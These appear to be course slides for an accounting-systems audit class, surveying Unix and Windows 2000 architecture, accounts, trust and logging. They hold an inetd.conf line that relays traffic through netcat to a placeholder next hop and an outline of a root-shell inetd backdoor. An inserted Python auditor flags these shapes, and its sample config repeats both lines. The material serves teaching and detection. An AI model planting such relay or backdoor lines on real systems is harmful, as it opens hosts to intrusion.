1
Overview of Unix
Jagdish S. Gangolly
School of Business, State University of New York at Albany
NOTE: These notes are based on the book Counter Hack, by Ed Skoudis, and are prepared solely for the students in the course Acc 661 at SUNY Albany. They are not to be used by others without the permission of the instructor.
9/16/2018 Acc 661 Auditing of Adv Acctg Systems (Spring 2003) Gangolly
2
Overview of Unix
- Architecture
  - File system structure
  - Kernel and processes
- Accounts and groups
3
Architecture: File System Structure
Hierarchical:
/
  bin
  dev
  etc
    passwd
    group
  home
  lib
  mnt
  proc
  tmp
  usr
    bin
    man
    sbin
  var
4
Architecture: Kernel & Processes I
- The CPU can run at most one program at a time
- The kernel schedules processes, allocates and manages memory, and prevents one process from accessing memory belonging to other processes
- Daemons (background processes) perform print spooling, network services, file sharing, web access, remote management capabilities, etc.
5
Architecture: Kernel & Processes II
- Automatically starting processes:
  - Init: parent of all user-level processes (/etc/init.d)
    - Httpd (port 80), Sendmail (port 25), NFS
  - Inetd (/etc/inetd.conf)
    - Echo, Chargen, FTPd, Telnetd, Shell, login, TFTP
  - Cron
- Vulnerability: use of inetd.conf to create attack relays
    11111 stream tcp nowait nobody /usr/sbin/tcpd /usr/bin/nc [next_hop] 54321
6
Architecture: Kernel & Processes III
- Vulnerability: create a backdoor using Inetd
  - Overflow a buffer in a program running with root-level privileges
  - Run a shell command to insert a line into the inetd.conf file (the line sets up a high-order TCP port, running as root a command shell to execute any commands received)
  - The killall command sends a HUP signal to the Inetd process, making it reread the configuration file
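As an added example (not from the slides or from Counter Hack), a small Python checker that parses /etc/inetd.conf entries and flags the relay and root-shell shapes described on the two preceding slides. The sample configuration is constructed, and [next_hop] is kept as the placeholder from the slide rather than a real host.

```python
# Audit /etc/inetd.conf entries for shapes that should not appear on a
# production system: netcat or a shell as the server program, and numeric
# high ports instead of named services. Sample input is constructed.

SUSPICIOUS_PROGRAMS = {"nc", "netcat", "sh", "bash", "ksh", "csh"}
HIGH_PORT = 1024  # numeric service names at or above this are unusual

SAMPLE_INETD_CONF = """\
# constructed sample /etc/inetd.conf
ftp     stream  tcp  nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root    /usr/sbin/tcpd  in.telnetd
# relay line from the lecture; [next_hop] is a placeholder, not a real host
11111   stream  tcp  nowait  nobody  /usr/sbin/tcpd  /usr/bin/nc [next_hop] 54321
# root shell on a high port, the backdoor shape from the lecture
54321   stream  tcp  nowait  root    /bin/sh         sh -i
"""


def parse_inetd_line(line):
    """Return a dict for one active entry, or None for blank/comment/malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    if len(fields) < 6:
        return None  # inetd needs at least service..server-program
    service, socktype, proto, wait, user = fields[:5]
    program, args = fields[5], fields[6:]
    # Behind a TCP wrapper (tcpd) the real server is the first argument.
    if program.endswith("tcpd") and args:
        program, args = args[0], args[1:]
    return {"service": service, "socktype": socktype, "proto": proto,
            "wait": wait, "user": user, "program": program, "args": args}


def audit_inetd(text):
    """Return a list of (service, reason) findings over inetd.conf contents."""
    findings = []
    for raw in text.splitlines():
        entry = parse_inetd_line(raw)
        if entry is None:
            continue
        svc = entry["service"]
        base = entry["program"].rsplit("/", 1)[-1]  # basename of the server program
        if base in SUSPICIOUS_PROGRAMS:
            findings.append((svc, "serves %s as user %s" % (base, entry["user"])))
        if svc.isdigit() and int(svc) >= HIGH_PORT:
            findings.append((svc, "numeric high port rather than a named service"))
    return findings


if __name__ == "__main__":
    for service, reason in audit_inetd(SAMPLE_INETD_CONF):
        print("%-6s %s" % (service, reason))
```

Running the block prints four findings: both the relay line and the root shell line are flagged twice, once for the server program and once for the high port.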
7
Accounts and Groups
- /etc/passwd
  - Login name, encrypted/hashed password, UID number, default GID number, GECOS information, home directory, login shell
  - Vulnerability: password attacks
    - Guessing, login scripts, L0phtCrack (Windows), John the Ripper
- /etc/group
- Unix permissions
- SetUID
8
Miscellaneous
- Unix trust
  - /etc/hosts.equiv
  - .rhosts
  - R-commands: rlogin, rsh, rcp, …
  - Vulnerable to IP spoofing
- Logs and auditing
  - /var/log/secure
  - /var/log/messages
  - /var/log/httpd, /var/log/cron, …
9
Miscellaneous
- utmp – who
- wtmp – last
- lastlog – time of user's last login
10
Windows 2000
- Domains: share authentication database
  - Primary Domain Controller (PDC)
  - Backup Domain Controller (BDC)
  - SAM database
- Shares: remote connections to network devices
- Service packs and hotfixes
11
Windows 2000: Architecture
- User Mode
- Kernel Mode
  - Executive Subsystems
  - Hardware Abstraction Layer
- Accounts and groups
  - Default accounts (Administrator, Guest)
  - Created by administrator
  - Groups: global and local
12
Windows 2000: Architecture II
- Privileges: Administrators, Users, Guests
  - Rights: things users can do that can be added or revoked
  - Abilities: built-in capabilities of groups that cannot be altered
- Policies:
  - Account policy
  - User properties settings
- Trust: no trust, complete trust, master domain, multiple master domain
13
Windows 2000: Architecture III
- Auditing
  - System logging
  - Security logging: logons/logoffs, file/object access, use of rights, …
  - Application logging
- Object access control and permissions
  - Ownership
  - NTFS permissions: No Access, Read, Change, Full Control
  - Share permissions